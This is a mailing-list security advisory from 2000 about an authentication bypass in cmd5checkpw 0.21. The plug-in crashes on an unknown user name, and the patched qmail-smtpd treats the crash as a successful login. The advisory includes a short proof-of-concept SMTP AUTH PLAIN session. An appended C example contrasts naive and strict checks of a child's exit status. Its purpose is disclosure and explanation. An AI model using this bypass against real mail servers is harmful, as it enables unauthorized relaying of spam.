Subject: Authentication failure in cmd5checkpw 0.21
From: Javier Kohen (jkohen@TOUGH.COM)
Date: Mon Oct 16 2000 - 21:18:21 CDT
- Next message: Microsoft Product Security: "Microsoft Security Bulletin (MS00-078)"
- Previous message: Louis Trumpbour: "Summercon 2001: RFP"
- Next in thread: Krzysztof Dabrowski: "Re: Authentication failure in cmd5checkpw 0.21"
- Reply: Krzysztof Dabrowski: "Re: Authentication failure in cmd5checkpw 0.21"
Program: cmd5checkpw
Vulnerable versions: 0.21 (probably earlier, too.)
Fixed versions: 0.22
URI: http://freshmeat.net/projects/cmd5checkpw/
Author: Elysium deeZine <http://www.elysium.pl/>
Description:
This program works as an authentication plug-in for a patch by the same author that adds SMTP AUTH support to qmail. I found that if it was fed a non-existing user name, it would segfault due to the lack of checking for the (improbable?) reason of such an invalid input. The exploit here comes from the consequence of this problem: the caller (in this case the patched qmail-smtpd) would take its child crashing as a successful authentication, thus validating the session. This brings an open door for spam.
Even though this utility was fixed, the vulnerability in the patch to qmail-smtpd still remains, leaving the door open to further bugs in the authentication plug-ins.
Proof of concept:
$ nc localhost smtp
< 220 ns.foo.com.ar ESMTP
> ehlo spammer.net
< 250-ns.foo.com.ar
< 250-AUTH=LOGIN CRAM-MD5 PLAIN
< 250-AUTH LOGIN CRAM-MD5 PLAIN
< 250-PIPELINING
< 250 8BITMIME
> auth plain
< 334 ok. go on.
> xyzzy<NUL>nopasswordneeded<NUL>
< ??? ok.
-- Javier Kohen <jkohen@tough.com> ICQ #2361802 [blashyrkh] http://www.tough.com.ar/
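The failure mode the advisory describes, as an added example that is not part of the original post, of cmd5checkpw, or of the qmail-smtpd patch: a caller that reads only the exit-code byte of its checkpassword-style child treats a signal death as success, while a strict check requires a normal exit with status 0. The child modes and function names here are hypothetical, chosen to illustrate the two interpretations side by side.

```c
/* Added example (hypothetical code): how a caller must interpret the wait
 * status of a checkpassword-style authentication child. */
#include <signal.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum child_mode { CHILD_ACCEPT, CHILD_REJECT, CHILD_CRASH };

/* Fork a stand-in for the plug-in and return its raw wait status (-1 on
 * error). CHILD_CRASH simulates the segfault on an unknown user name. */
static int run_checker(enum child_mode mode)
{
    int status = 0;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        struct rlimit rl = { 0, 0 };
        setrlimit(RLIMIT_CORE, &rl);         /* no core file for the demo */
        if (mode == CHILD_ACCEPT) _exit(0);  /* checkpassword: 0 = ok */
        if (mode == CHILD_REJECT) _exit(1);  /* nonzero = denied */
        signal(SIGSEGV, SIG_DFL);            /* make sure the signal kills us */
        raise(SIGSEGV);                      /* die by signal, no exit code */
        _exit(111);
    }
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return status;
}

/* Flawed interpretation: looks only at the exit-code byte. For a child
 * killed by a signal that byte is 0, so a crash reads as success. */
static int naive_auth_ok(int status)
{
    return WEXITSTATUS(status) == 0;
}

/* Correct interpretation: success only on a normal exit with code 0.
 * A signal death or a fork/wait error (status < 0) is a failure. */
static int strict_auth_ok(int status)
{
    return status >= 0 && WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

int main(void)
{
    int crash = run_checker(CHILD_CRASH);
    printf("crashed child: naive=%d strict=%d\n",
           naive_auth_ok(crash), strict_auth_ok(crash));
    return 0;
}
```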